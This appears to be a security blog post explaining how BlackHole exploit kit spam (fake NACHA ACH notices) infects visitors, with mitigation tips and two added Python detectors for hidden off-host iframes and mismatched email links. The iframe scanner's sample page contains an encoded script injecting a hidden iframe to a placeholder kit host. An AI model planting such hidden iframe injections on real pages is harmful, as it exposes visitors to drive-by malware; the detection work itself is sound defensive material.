Lately, we have been seeing a renewed increase in the volume of spam attacks that utilize an exploit kit – specifically, the BlackHole exploit kit – to trigger a malicious payload. We have seen this in the latest slew of Automated Clearing House (ACH) spam, and in the more recent spam run related to Steve Jobs’ death.
In this post, we will reorient readers on the infection chain of such attacks to help us understand why the basic mitigation practices are still effective and helpful in protecting oneself from today’s threats.
In a typical spam campaign that involves malware, cybercriminals lure users through social engineering into performing several actions before the intended payload gets executed. For example, a user needs to download, extract, and execute a supposedly “benign” file for a spam attack to succeed.
Spam campaigns using exploit kits, however, are a bit more dangerous since they only need to lure the user into clicking a malicious link; the rest of the infection then takes place without any further action from the user.
Below is an example of this type of spam purporting to be coming from National Automated Clearing House Association (NACHA). NACHA manages the ACH network, which facilitates bulk payment transactions involving businesses, governments, as well as consumers. Users who are more likely to receive email from NACHA are those who conduct transactions related to payroll, government benefits, tax refunds, and others.
In the spam screenshot above, we can see that the link points to a dubious-looking domain that is not related to National Automated Clearing House Association (NACHA). A blank page is displayed when users click the link. This blank page is actually a gateway page that contains the following obfuscated JavaScript:
When decoded, we can see that it is a script that attempts to embed an iframe pointing to another malicious site, which uses the BlackHole Exploit Kit:
Once the iframe is loaded, content is also loaded from the BlackHole Exploit Kit site which, again, contains a highly obfuscated script. Decoding it reveals the actual code, which checks for vulnerable software on the visitor’s system and serves the appropriate exploits.
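The gateway page described above hides its iframe behind an obfuscated script, so the redirect is invisible to a casual look at the HTML. As an added, defender-side example (not code from the original post), the following Python scanner peels one common obfuscation layer, `document.write(unescape('...'))`, and then flags iframes that point to a different host and/or are rendered invisible (1x1 or hidden by inline style). The sample pages, the `unescape()` pattern and all hostnames (`*.example.invalid`) are constructed assumptions for illustration; real kits use other encoders too, so this is a starting heuristic rather than a complete detector.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample of a gateway page (not the post's real script): an
# unescape()-obfuscated document.write that, once decoded, injects a 1x1
# hidden iframe pointing at a second, hypothetical host.
SAMPLE_GATEWAY_PAGE = """<html><body>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fkit.example.invalid%2Fmain.php%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'));</script>
</body></html>"""

# Constructed benign page: a visible, same-origin iframe that should not be flagged.
SAMPLE_BENIGN_PAGE = '<div><iframe src="/widget.html" width="300" height="200"></iframe></div>'

UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"(\w+)\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)")


def decode_layers(html, max_rounds=5):
    """Replace every unescape('...') literal with its percent-decoded value,
    repeating so nested layers are peeled. This is only one obfuscation
    pattern (assumed here); real kits also use other encoders."""
    for _ in range(max_rounds):
        decoded = UNESCAPE_RE.sub(lambda m: unquote(m.group(2)), html)
        if decoded == html:
            break
        html = decoded
    return html


def parse_attrs(attr_text):
    """Turn an iframe's attribute string into a lower-cased dict."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(attr_text)}


def is_hidden(attrs):
    """Heuristic: the iframe is effectively invisible (hidden via inline
    style, or 1x1 or smaller)."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        return True

    def dim(value):
        digits = re.sub(r"\D", "", value or "")
        return int(digits) if digits else None

    width, height = dim(attrs.get("width")), dim(attrs.get("height"))
    return width is not None and height is not None and width <= 1 and height <= 1


def find_suspicious_iframes(html, page_host):
    """Return [(src, [reasons])] for iframes that point to another host
    and/or are hidden, after peeling unescape() obfuscation."""
    findings = []
    for match in IFRAME_RE.finditer(decode_layers(html)):
        attrs = parse_attrs(match.group(1))
        src = attrs.get("src", "")
        host = urlparse(src).hostname or page_host  # relative src -> same host
        reasons = []
        if host.lower() != page_host.lower():
            reasons.append("off-host")
        if is_hidden(attrs):
            reasons.append("hidden")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    print(find_suspicious_iframes(SAMPLE_GATEWAY_PAGE, "gateway.example.invalid"))
    print(find_suspicious_iframes(SAMPLE_BENIGN_PAGE, "gateway.example.invalid"))
```

Run against a fetched page body and the host it was served from; a hit with both reasons (off-host and hidden) is the shape of the gateway-to-kit hop described above and is worth a closer look, while a visible same-origin iframe produces no finding.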
The BlackHole Exploit Kit exploits vulnerabilities both in third-party applications like Adobe Acrobat, Adobe Flash, and Java, as well as in Windows components like Microsoft Data Access Components (MDAC) and Help and Support Center (HCP).
Successful exploitation executes a shellcode, which triggers downloading and executing malware. We have observed that these attacks have been used to spread ZeuS variants, although these may also be used to spread other malware families.
Multilayer Mitigation
As a reminder to users, here are some ways to prevent this kind of threat from getting into their systems:
- Be aware of social engineering attacks. A majority of online attacks today rely on social engineering before any technical infection takes place. Being wary of what you do online can stop infections at the onset. Simple common sense, such as not entertaining unsolicited emails, goes a long way toward your personal online security.
- Always check for malicious links. Always check where a hyperlink’s URL actually points. It is also good practice to copy and paste a URL into your browser’s address bar instead of clicking links directly.
- Consider disabling JavaScript in your browser. As mentioned earlier, the gateway page and the BlackHole Exploit Kit page both use JavaScript. This is also the case for a lot of threats today that use the browser to execute a malicious payload. As such, it is a good idea to consider disabling JavaScript in your browser and only allowing it on trusted sites if necessary.
- Always remember to patch. The BlackHole Exploit Kit utilizes exploits that affect old, unpatched versions of software. The persistence of such tools means that old exploits are still able to infect many users. No matter how inconvenient it may be, patching your software regularly remains an important mitigation step.
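The second item above, checking where a link actually points, is easy to automate for mail that arrives in HTML form. The following Python audit is an added example (not the original post’s code) that extracts every anchor from an email body and flags two conditions: the href host lies outside the domain the sender claims to be, and the visible link text looks like a URL for a different host than the href. The email body and the domains (`sender.example`, `lookalike.invalid`) are constructed placeholders; the page names no real domains, so you would substitute the sender’s legitimate domain when using it.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample email body (hostnames are placeholders, not real
# infrastructure): the first link's visible text claims one domain while its
# href points somewhere else; the second link is consistent.
SAMPLE_EMAIL_HTML = """<p>Your ACH transfer was rejected.</p>
<p>Details: <a href="http://report.lookalike.invalid/ach.php">https://www.sender.example/ach/report</a></p>
<p>Help: <a href="https://www.sender.example/help">Support center</a></p>"""


class AnchorCollector(HTMLParser):
    """Collects (href, visible text) pairs from an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(value):
    """Hostname of a URL or bare domain, lower-cased; None if not URL-like."""
    parsed = urlparse(value if "://" in value else "http://" + value)
    return parsed.hostname.lower() if parsed.hostname else None


def is_subdomain_of(host, domain):
    domain = domain.lower()
    return host == domain or host.endswith("." + domain)


def audit_links(html, expected_domain):
    """Return [(href, [reasons])] for links that point outside expected_domain
    or whose visible text names a different host than the href."""
    parser = AnchorCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        href_host = host_of(href)
        reasons = []
        if href_host is None or not is_subdomain_of(href_host, expected_domain):
            reasons.append("points outside %s" % expected_domain)
        # Only treat the visible text as a URL when it has no spaces and a dot.
        text_host = host_of(text) if ("." in text and " " not in text) else None
        if text_host and href_host and text_host != href_host:
            reasons.append("visible text says %s" % text_host)
        if reasons:
            findings.append((href, reasons))
    return findings


if __name__ == "__main__":
    for href, reasons in audit_links(SAMPLE_EMAIL_HTML, "sender.example"):
        print(href, "->", "; ".join(reasons))
```

The text-versus-href mismatch is the stronger signal of the two, since a legitimate mailer has no reason to display one URL and link to another; the off-domain check on its own will also fire on harmless tracking redirectors, so treat it as a prompt to copy the URL into the address bar rather than as proof of malice.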